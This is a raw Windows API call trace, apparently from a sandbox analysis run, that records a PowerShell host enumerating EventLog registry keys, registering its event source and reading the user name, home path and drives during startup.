	[0509.840] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x7, lpName=0x3f1af0, lpcchName=0x1ad4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ad4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0509.840] CoTaskMemFree (pv=0x3f1af0) 
	[0509.841] CoTaskMemFree (pv=0x0) 
	[0509.841] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0509.841] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x8, lpName=0x3f1af0, lpcchName=0x1ad4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ad4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0509.841] CoTaskMemFree (pv=0x3f1af0) 
	[0509.841] CoTaskMemFree (pv=0x0) 
	[0509.841] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad508 | out: phkResult=0x1ad508*=0x348) returned 0x0
	[0509.841] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad508 | out: phkResult=0x1ad508*=0x0) returned 0x2
	[0509.841] RegOpenKeyExW (in: hKey=0x344, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad508 | out: phkResult=0x1ad508*=0x34c) returned 0x0
	[0509.841] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad508 | out: phkResult=0x1ad508*=0x0) returned 0x2
	[0509.841] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad508 | out: phkResult=0x1ad508*=0x350) returned 0x0
	[0509.841] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad508 | out: phkResult=0x1ad508*=0x0) returned 0x2
	[0509.841] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad508 | out: phkResult=0x1ad508*=0x354) returned 0x0
	[0509.842] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad508 | out: phkResult=0x1ad508*=0x0) returned 0x2
	[0509.842] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad508 | out: phkResult=0x1ad508*=0x358) returned 0x0
	[0509.842] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad508 | out: phkResult=0x1ad508*=0x0) returned 0x2
	[0509.842] RegOpenKeyExW (in: hKey=0x344, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad508 | out: phkResult=0x1ad508*=0x35c) returned 0x0
	[0509.842] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad508 | out: phkResult=0x1ad508*=0x0) returned 0x2
	[0509.842] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad508 | out: phkResult=0x1ad508*=0x360) returned 0x0
	[0509.842] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad508 | out: phkResult=0x1ad508*=0x0) returned 0x2
	[0509.842] RegOpenKeyExW (in: hKey=0x344, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad508 | out: phkResult=0x1ad508*=0x364) returned 0x0
	[0509.842] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad508 | out: phkResult=0x1ad508*=0x0) returned 0x2
	[0509.843] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad508 | out: phkResult=0x1ad508*=0x368) returned 0x0
	[0509.843] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad508 | out: phkResult=0x1ad508*=0x36c) returned 0x0
	[0509.843] RegCloseKey (hKey=0x36c) returned 0x0
	[0509.843] RegCloseKey (hKey=0x344) returned 0x0
	[0509.843] RegCloseKey (hKey=0x368) returned 0x0
	[0509.844] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad4a8 | out: phkResult=0x1ad4a8*=0x368) returned 0x0
	[0509.844] RegQueryInfoKeyW (in: hKey=0x368, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ad41c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad418, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ad41c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad418*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0509.844] CoTaskMemFree (pv=0x0) 
	[0509.844] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0509.844] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x0, lpName=0x3f1af0, lpcchName=0x1ad4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ad4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0509.844] CoTaskMemFree (pv=0x3f1af0) 
	[0509.844] CoTaskMemFree (pv=0x0) 
	[0509.845] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0509.845] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x1, lpName=0x3f1af0, lpcchName=0x1ad4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ad4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0509.845] CoTaskMemFree (pv=0x3f1af0) 
	[0509.845] CoTaskMemFree (pv=0x0) 
	[0509.845] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0509.845] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x2, lpName=0x3f1af0, lpcchName=0x1ad4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ad4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0509.845] CoTaskMemFree (pv=0x3f1af0) 
	[0509.845] CoTaskMemFree (pv=0x0) 
	[0509.845] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0509.845] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x3, lpName=0x3f1af0, lpcchName=0x1ad4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ad4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0509.845] CoTaskMemFree (pv=0x3f1af0) 
	[0509.845] CoTaskMemFree (pv=0x0) 
	[0509.845] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0509.845] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x4, lpName=0x3f1af0, lpcchName=0x1ad4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ad4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0509.845] CoTaskMemFree (pv=0x3f1af0) 
	[0509.845] CoTaskMemFree (pv=0x0) 
	[0509.845] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0509.845] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x5, lpName=0x3f1af0, lpcchName=0x1ad4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ad4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0509.845] CoTaskMemFree (pv=0x3f1af0) 
	[0509.845] CoTaskMemFree (pv=0x0) 
	[0509.845] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0509.845] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x6, lpName=0x3f1af0, lpcchName=0x1ad4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ad4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0509.846] CoTaskMemFree (pv=0x3f1af0) 
	[0509.846] CoTaskMemFree (pv=0x0) 
	[0509.846] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0509.846] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x7, lpName=0x3f1af0, lpcchName=0x1ad4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ad4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0509.846] CoTaskMemFree (pv=0x3f1af0) 
	[0509.846] CoTaskMemFree (pv=0x0) 
	[0509.846] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0509.846] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x8, lpName=0x3f1af0, lpcchName=0x1ad4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ad4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0509.846] CoTaskMemFree (pv=0x3f1af0) 
	[0509.846] CoTaskMemFree (pv=0x0) 
	[0509.846] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad508 | out: phkResult=0x1ad508*=0x344) returned 0x0
	[0509.846] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad508 | out: phkResult=0x1ad508*=0x0) returned 0x2
	[0509.846] RegOpenKeyExW (in: hKey=0x368, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad508 | out: phkResult=0x1ad508*=0x36c) returned 0x0
	[0509.846] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad508 | out: phkResult=0x1ad508*=0x0) returned 0x2
	[0509.846] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad508 | out: phkResult=0x1ad508*=0x370) returned 0x0
	[0509.847] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad508 | out: phkResult=0x1ad508*=0x0) returned 0x2
	[0509.847] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad508 | out: phkResult=0x1ad508*=0x374) returned 0x0
	[0509.847] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad508 | out: phkResult=0x1ad508*=0x0) returned 0x2
	[0509.847] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad508 | out: phkResult=0x1ad508*=0x378) returned 0x0
	[0509.847] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad508 | out: phkResult=0x1ad508*=0x0) returned 0x2
	[0509.847] RegOpenKeyExW (in: hKey=0x368, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad508 | out: phkResult=0x1ad508*=0x37c) returned 0x0
	[0509.847] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad508 | out: phkResult=0x1ad508*=0x0) returned 0x2
	[0509.847] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad508 | out: phkResult=0x1ad508*=0x380) returned 0x0
	[0509.847] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad508 | out: phkResult=0x1ad508*=0x0) returned 0x2
	[0509.847] RegOpenKeyExW (in: hKey=0x368, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad508 | out: phkResult=0x1ad508*=0x384) returned 0x0
	[0509.847] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad508 | out: phkResult=0x1ad508*=0x0) returned 0x2
	[0509.848] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad508 | out: phkResult=0x1ad508*=0x388) returned 0x0
	[0509.848] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad508 | out: phkResult=0x1ad508*=0x38c) returned 0x0
	[0509.848] RegCloseKey (hKey=0x38c) returned 0x0
	[0509.848] RegCloseKey (hKey=0x368) returned 0x0
	[0509.848] RegCloseKey (hKey=0x388) returned 0x0
	[0509.850] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad478 | out: phkResult=0x1ad478*=0x388) returned 0x0
	[0509.850] RegQueryInfoKeyW (in: hKey=0x388, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ad3ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad3e8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ad3ec*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad3e8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0509.850] CoTaskMemFree (pv=0x0) 
	[0509.850] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0509.850] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x0, lpName=0x3f1af0, lpcchName=0x1ad478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ad478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0509.850] CoTaskMemFree (pv=0x3f1af0) 
	[0509.850] CoTaskMemFree (pv=0x0) 
	[0509.850] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0509.850] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x1, lpName=0x3f1af0, lpcchName=0x1ad478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ad478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0509.851] CoTaskMemFree (pv=0x3f1af0) 
	[0509.851] CoTaskMemFree (pv=0x0) 
	[0509.851] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0509.851] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x2, lpName=0x3f1af0, lpcchName=0x1ad478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ad478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0509.851] CoTaskMemFree (pv=0x3f1af0) 
	[0509.851] CoTaskMemFree (pv=0x0) 
	[0509.851] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0509.851] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x3, lpName=0x3f1af0, lpcchName=0x1ad478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ad478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0509.851] CoTaskMemFree (pv=0x3f1af0) 
	[0509.851] CoTaskMemFree (pv=0x0) 
	[0509.851] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0509.851] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x4, lpName=0x3f1af0, lpcchName=0x1ad478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ad478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0509.851] CoTaskMemFree (pv=0x3f1af0) 
	[0509.851] CoTaskMemFree (pv=0x0) 
	[0509.851] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0509.851] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x5, lpName=0x3f1af0, lpcchName=0x1ad478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ad478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0509.851] CoTaskMemFree (pv=0x3f1af0) 
	[0509.851] CoTaskMemFree (pv=0x0) 
	[0509.851] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0509.851] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x6, lpName=0x3f1af0, lpcchName=0x1ad478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ad478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0509.851] CoTaskMemFree (pv=0x3f1af0) 
	[0509.851] CoTaskMemFree (pv=0x0) 
	[0509.851] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0509.852] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x7, lpName=0x3f1af0, lpcchName=0x1ad478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ad478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0509.852] CoTaskMemFree (pv=0x3f1af0) 
	[0509.852] CoTaskMemFree (pv=0x0) 
	[0509.852] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0509.852] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x8, lpName=0x3f1af0, lpcchName=0x1ad478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ad478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0509.852] CoTaskMemFree (pv=0x3f1af0) 
	[0509.852] CoTaskMemFree (pv=0x0) 
	[0509.852] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad4d8 | out: phkResult=0x1ad4d8*=0x368) returned 0x0
	[0509.852] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad4d8 | out: phkResult=0x1ad4d8*=0x0) returned 0x2
	[0509.852] RegOpenKeyExW (in: hKey=0x388, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad4d8 | out: phkResult=0x1ad4d8*=0x38c) returned 0x0
	[0509.852] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad4d8 | out: phkResult=0x1ad4d8*=0x0) returned 0x2
	[0509.852] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad4d8 | out: phkResult=0x1ad4d8*=0x390) returned 0x0
	[0509.853] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad4d8 | out: phkResult=0x1ad4d8*=0x0) returned 0x2
	[0509.853] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad4d8 | out: phkResult=0x1ad4d8*=0x394) returned 0x0
	[0509.853] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad4d8 | out: phkResult=0x1ad4d8*=0x0) returned 0x2
	[0509.853] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad4d8 | out: phkResult=0x1ad4d8*=0x398) returned 0x0
	[0509.853] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad4d8 | out: phkResult=0x1ad4d8*=0x0) returned 0x2
	[0509.853] RegOpenKeyExW (in: hKey=0x388, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad4d8 | out: phkResult=0x1ad4d8*=0x39c) returned 0x0
	[0509.853] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad4d8 | out: phkResult=0x1ad4d8*=0x0) returned 0x2
	[0509.853] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad4d8 | out: phkResult=0x1ad4d8*=0x3a0) returned 0x0
	[0509.854] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad4d8 | out: phkResult=0x1ad4d8*=0x0) returned 0x2
	[0509.854] RegOpenKeyExW (in: hKey=0x388, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad4d8 | out: phkResult=0x1ad4d8*=0x3a4) returned 0x0
	[0509.854] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad4d8 | out: phkResult=0x1ad4d8*=0x0) returned 0x2
	[0509.854] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad4d8 | out: phkResult=0x1ad4d8*=0x3a8) returned 0x0
	[0509.854] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad4d8 | out: phkResult=0x1ad4d8*=0x3ac) returned 0x0
	[0509.854] RegCloseKey (hKey=0x3ac) returned 0x0
	[0509.855] RegCloseKey (hKey=0x388) returned 0x0
	[0509.855] RegCloseKey (hKey=0x3a8) returned 0x0
	[0509.961] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1ba80008
	[0510.562] ReportEventW (hEventLog=0x1ba80008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2eca828*="WSMan", lpRawData=0x2eca598) returned 1
	[0510.563] CoTaskMemAlloc (cb=0x104) returned 0x4341c0
	[0510.563] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4341c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0510.563] CoTaskMemFree (pv=0x4341c0) 
	[0510.564] CoTaskMemAlloc (cb=0x804) returned 0x1b83fb60
	[0510.564] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b83fb60, nSize=0x1ad768 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad768) returned 0x1
	[0510.564] CoTaskMemFree (pv=0x1b83fb60) 
	[0510.564] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0510.564] GetUserNameW (in: lpBuffer=0x3f1af0, pcbBuffer=0x1ad7a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad7a8) returned 1
	[0510.564] CoTaskMemFree (pv=0x3f1af0) 
	[0510.565] ReportEventW (hEventLog=0x1ba80008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ecfd60*="Alias", lpRawData=0x2ecfaf0) returned 1
	[0510.565] CoTaskMemAlloc (cb=0x104) returned 0x4341c0
	[0510.565] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4341c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0510.565] CoTaskMemFree (pv=0x4341c0) 
	[0510.566] CoTaskMemAlloc (cb=0x804) returned 0x1b83fb60
	[0510.566] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b83fb60, nSize=0x1ad768 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad768) returned 0x1
	[0510.567] CoTaskMemFree (pv=0x1b83fb60) 
	[0510.567] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0510.567] GetUserNameW (in: lpBuffer=0x3f1af0, pcbBuffer=0x1ad7a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad7a8) returned 1
	[0510.567] CoTaskMemFree (pv=0x3f1af0) 
	[0510.567] ReportEventW (hEventLog=0x1ba80008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ed5358*="Environment", lpRawData=0x2ed50e8) returned 1
	[0510.568] CoTaskMemAlloc (cb=0x104) returned 0x4341c0
	[0510.568] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4341c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0510.568] CoTaskMemFree (pv=0x4341c0) 
	[0510.568] CoTaskMemAlloc (cb=0x104) returned 0x4341c0
	[0510.568] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x4341c0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0510.568] CoTaskMemFree (pv=0x4341c0) 
	[0510.568] CoTaskMemAlloc (cb=0x104) returned 0x4341c0
	[0510.568] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x4341c0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0510.568] CoTaskMemFree (pv=0x4341c0) 
	[0510.569] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x1ad310, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0510.569] SetErrorMode (uMode=0x1) returned 0x1
	[0510.569] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x1ad520 | out: lpFileInformation=0x1ad520*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0510.569] SetErrorMode (uMode=0x1) returned 0x1
	[0510.569] GetLogicalDrives () returned 0x4
	[0510.570] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ad080, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0510.570] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0510.570] SetErrorMode (uMode=0x1) returned 0x1
	[0510.571] CoTaskMemAlloc (cb=0x68) returned 0x454a30
	[0510.571] CoTaskMemAlloc (cb=0x68) returned 0x4549c0
